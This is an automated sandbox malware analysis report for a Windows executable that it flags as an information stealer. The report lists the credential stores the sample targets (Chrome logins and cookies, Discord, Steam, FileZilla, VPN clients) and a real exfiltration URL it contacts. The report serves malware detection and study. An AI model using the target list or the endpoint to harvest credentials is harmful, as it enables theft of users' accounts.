Play interactive tour

Edit tour

Analysis Report SpiMLVsYmg.exe

Overview

General Information

Sample Name:	SpiMLVsYmg.exe
Analysis ID:	376834
MD5:	f56a39a0417c779c0b48fa7b2638cc58
SHA1:	351ad6d8775a69d06498dbc6953f366f6c5e11fc
SHA256:	97e799becef44ad19659b81b1d8604ec6888304efc73bb105ed233096ad20045
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Instant Messenger accounts or passwords

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found potential string decryption / allocating functions

Queries information about the installed CPU (vendor, model number etc)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

SpiMLVsYmg.exe (PID: 6504 cmdline: 'C:\Users\user\Desktop\SpiMLVsYmg.exe' MD5: F56A39A0417C779C0B48FA7B2638CC58)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: SpiMLVsYmg.exe	Virustotal: Detection: 30%			Perma Link
Source: SpiMLVsYmg.exe	ReversingLabs: Detection: 17%

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D94693 PathFileExistsW,PathFileExistsW,CreateFileW,GetFileSize,GlobalAlloc,ReadFile,IsTextUnicode,IsTextUnicode,GlobalAlloc,MultiByteToWideChar,GlobalFree,CloseHandle,StrStrW,StrStrW,StrChrW,StrChrW,CryptUnprotectData,CryptUnprotectData,GlobalAlloc,GlobalFree,GlobalFree,GlobalFree,	0_2_00D94693
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D9388D GlobalAlloc,StrStrA,StrStrA,GlobalFree,CryptUnprotectData,CryptUnprotectData,	0_2_00D9388D
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D36021 CryptUnprotectData,CryptUnprotectData,	0_2_00D36021

Source: SpiMLVsYmg.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: SpiMLVsYmg.exe

Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wkernel32.pdb source: SpiMLVsYmg.exe, 00000000.00000002.350244537.000000006B880000.00000002.00000001.sdmp
Source:	Binary string: C:\Users\host\source\repos\Cypress\Release\Cypress.pdbGCTL source: SpiMLVsYmg.exe
Source:	Binary string: C:\Users\host\source\repos\Cypress\Release\Cypress.pdb source: SpiMLVsYmg.exe
Source:	Binary string: wkernel32.pdbGCTL source: SpiMLVsYmg.exe, 00000000.00000002.350244537.000000006B880000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

Code function: 0_2_00D361C3 lstrcatW,FindFirstFileW,FindNextFileW,PathCombineW,PathCombineW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenW,GlobalAlloc,lstrcpyW,lstrlenW,StrRChrW,StrRChrW,lstrcpyW,lstrlenW,GlobalAlloc,lstrcpyW,lstrlenW,StrRChrW,StrRChrW,lstrcpyW,lstrlenW,GlobalAlloc,lstrcpyW,lstrlenW,StrRChrW,StrRChrW,lstrcpyW,lstrlenW,GlobalAlloc,lstrcpyW,GlobalAlloc,FindNextFileW,FindClose,GlobalFree,

0_2_00D361C3

Source: global traffic

HTTP traffic detected: GET /reciver.php HTTP/1.1Accept: */*Content-Type: application/octet-stream;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36Host: ck12339.tmweb.ruContent-Length: 552234

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

Code function: 0_2_00D349A9 InternetOpenW,InternetOpenW,InternetConnectW,InternetConnectW,HttpOpenRequestW,HttpOpenRequestW,GlobalAlloc,lstrlenW,HttpSendRequestW,HttpSendRequestW,InternetReadFile,InternetReadFile,StrStrA,StrStrA,GlobalFree,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00D349A9

Source: global traffic

Source: unknown

DNS traffic detected: queries for: ck12339.tmweb.ru

Source: SpiMLVsYmg.exe, 00000000.00000002.349232955.0000000011DD7000.00000004.00000001.sdmp	String found in binary or memory: http://ck12339.tmweb.ru/reciver.php
Source: SpiMLVsYmg.exe, 00000000.00000002.349232955.0000000011DD7000.00000004.00000001.sdmp	String found in binary or memory: http://ck12339.tmweb.ru/reciver.phpc
Source: SpiMLVsYmg.exe, 00000000.00000002.346575697.0000000004B03000.00000004.00000001.sdmp	String found in binary or memory: http://ck12339.tmweb.ru/reciver.phps9l
Source: SpiMLVsYmg.exe, 00000000.00000002.346462437.00000000030C6000.00000004.00000020.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SpiMLVsYmg.exe, 00000000.00000002.346462437.00000000030C6000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SpiMLVsYmg.exe, 00000000.00000002.346462437.00000000030C6000.00000004.00000020.sdmp, SpiMLVsYmg.exe, 00000000.00000002.349220889.0000000011DCE000.00000004.00000001.sdmp, SpiMLVsYmg.exe, 00000000.00000002.346442652.00000000030A6000.00000004.00000020.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SpiMLVsYmg.exe, 00000000.00000002.346462437.00000000030C6000.00000004.00000020.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SpiMLVsYmg.exe, 00000000.00000002.349220889.0000000011DCE000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabl
Source: SpiMLVsYmg.exe, 00000000.00000002.346442652.00000000030A6000.00000004.00000020.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabo4
Source: SpiMLVsYmg.exe, 00000000.00000002.346462437.00000000030C6000.00000004.00000020.sdmp, SpiMLVsYmg.exe, 00000000.00000002.349220889.0000000011DCE000.00000004.00000001.sdmp, SpiMLVsYmg.exe, 00000000.00000002.346442652.00000000030A6000.00000004.00000020.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SpiMLVsYmg.exe, 00000000.00000002.346462437.00000000030C6000.00000004.00000020.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: SpiMLVsYmg.exe, 00000000.00000002.346462437.00000000030C6000.00000004.00000020.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SpiMLVsYmg.exe, 00000000.00000002.346462437.00000000030C6000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

Code function: 0_2_00D99A49 GetProcessHeap,KiUserCallbackDispatcher,GetSystemMetrics,GetDC,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateDIBSection,SelectObject,BitBlt,GlobalAlloc,GlobalAlloc,GlobalFree,GlobalFree,DeleteDC,ReleaseDC,DeleteObject,

0_2_00D99A49

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D2AC73	0_2_00D2AC73
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D2F3DF	0_2_00D2F3DF
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D336D1	0_2_00D336D1
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D2FE64	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D92073	0_2_00D92073
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D501A3	0_2_00D501A3
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D24136	0_2_00D24136
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D7A320	0_2_00D7A320
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D9C49D	0_2_00D9C49D
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D2658C	0_2_00D2658C
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D8C6CB	0_2_00D8C6CB
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D247B6	0_2_00D247B6
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Code function: 0_2_00D8885F	0_2_00D8885F

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

Code function: String function: 00D3B659 appears 55 times

Source: SpiMLVsYmg.exe, 00000000.00000002.350314994.000000006B8C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs SpiMLVsYmg.exe
Source: SpiMLVsYmg.exe, 00000000.00000002.350125466.0000000012860000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs SpiMLVsYmg.exe

Source: SpiMLVsYmg.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: classification engine

Classification label: mal60.phis.spyw.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90

Jump to behavior

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: LoadLibraryW	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: GetProcAddress	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: CRYPT32.dll	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: Advapi32.dll	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: wininet.dll	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: shlwapi.dll	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: GetProcAddress	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: LoadLibraryW	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: FreeLibrary	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: FindFirstFileW	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: FindNextFileW	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: FindClose	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: CreateFileW	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: ReadFile	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: CloseHandle	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: CRYPT32.dll	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: Advapi32.dll	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: RegOpenKeyExW	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: RegEnumKeyExW	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: RegCloseKey	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: IsTextUnicode	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: CredEnumerateW	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: CredFree	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: wininet.dll	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: InternetOpenW	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: shlwapi.dll	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: shlwapi.dll	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: shlwapi.dll	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: StrChrA	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: StrChrW	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: StrStrW	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: PathCombineW	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: PathFileExistsW	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: StrStrA	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: StrRChrW	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: AppData	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: username	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: entropy	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: auth-data	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: %S.txt	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: ProtonVPN	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: NordVPN	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: filezilla.log	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: %s%s%s%S	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: InstallLocation	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: discord	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: credmanager.txt	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: \loginusers.vdf	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: ssfn	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: Steam\%s	0_2_00D2FE64
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Command line argument: foo1.zip	0_2_00D2FE64

Source: SpiMLVsYmg.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SpiMLVsYmg.exe, 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SpiMLVsYmg.exe	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);

Source: SpiMLVsYmg.exe	Virustotal: Detection: 30%
Source: SpiMLVsYmg.exe	ReversingLabs: Detection: 17%

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\7.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: SpiMLVsYmg.exe

Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: SpiMLVsYmg.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: SpiMLVsYmg.exe, 00000000.00000002.350244537.000000006B880000.00000002.00000001.sdmp
Source:	Binary string: C:\Users\host\source\repos\Cypress\Release\Cypress.pdbGCTL source: SpiMLVsYmg.exe
Source:	Binary string: C:\Users\host\source\repos\Cypress\Release\Cypress.pdb source: SpiMLVsYmg.exe
Source:	Binary string: wkernel32.pdbGCTL source: SpiMLVsYmg.exe, 00000000.00000002.350244537.000000006B880000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

Code function: 0_2_00D7E973 push 8BFFFFFFh; retf

0_2_00D7E978

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

0_2_00D361C3

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

Code function: 0_2_00D3F41E GetSystemInfo,

0_2_00D3F41E

Source: SpiMLVsYmg.exe, 00000000.00000002.346499097.000000000310A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWX
Source: SpiMLVsYmg.exe, 00000000.00000002.349748869.0000000011F46000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: SpiMLVsYmg.exe, 00000000.00000002.349748869.0000000011F46000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWD

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

Code function: 0_2_00DA60BD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00DA60BD

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

0_2_00D99A49

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

Code function: 0_2_00DA60BD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00DA60BD

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

Code function: 0_2_00DA452A GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_00DA452A

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

Code function: 0_2_00DA76C1 _free,_free,_free,GetTimeZoneInformation,_free,

0_2_00DA76C1

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
